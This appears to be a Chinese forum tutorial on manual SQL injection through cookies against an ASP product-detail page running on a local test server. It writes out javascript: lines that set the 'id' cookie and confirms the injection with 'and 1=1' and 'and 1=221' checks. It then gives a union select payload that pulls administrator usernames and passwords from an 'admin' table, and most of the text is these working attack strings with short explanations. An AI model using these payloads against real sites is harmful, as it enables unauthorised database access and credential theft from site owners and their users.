cookie手注

1.先访问当前注入点文件名

 
2.修改cookie
 
javascript:alert(document.cookie="id="+escape("1137"));
把当前站点的cookie内容修改为id=260 并且弹窗显示出当前的cookie内容
 
 
 
 
注入点:
http://127.0.0.1:800/asp/Production/PRODUCT_DETAIL.asp?id=1137
 
注入点文件名:
http://127.0.0.1:800/asp/Production/PRODUCT_DETAIL.asp?
 
 
javascript:alert(document.cookie="id="+escape("260"));
 
 
内容:document.cookie="id="+escape("260")
 
document.cookie //修改cookie
"id="+escape("260")
//id是咱们注入点的参数
260 //参数值
 
 
 
javascript //使用js语句
 
alert //弹出窗口,
 
 
javascript:alert(document.cookie="id="+escape("1137"));
把当前站点的cookie内容修改为id=260 并且弹窗显示出当前的cookie内容
 
判断是否存在注入
javascript:alert(document.cookie="id="+escape("1137 and 1=1"));
返回正常
 
javascript:alert(document.cookie="id="+escape("1137 and 1=221"));
返回错误
 
 
查询指定管理员
 
javascript:alert(document.cookie="id="+escape("1137 union select 1,2,admin,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22 from admin where id=40"));
转载请注明本文链接: http://www.mayidui.net/t2262.html
游客
登录后才可以回帖,登录 或者 注册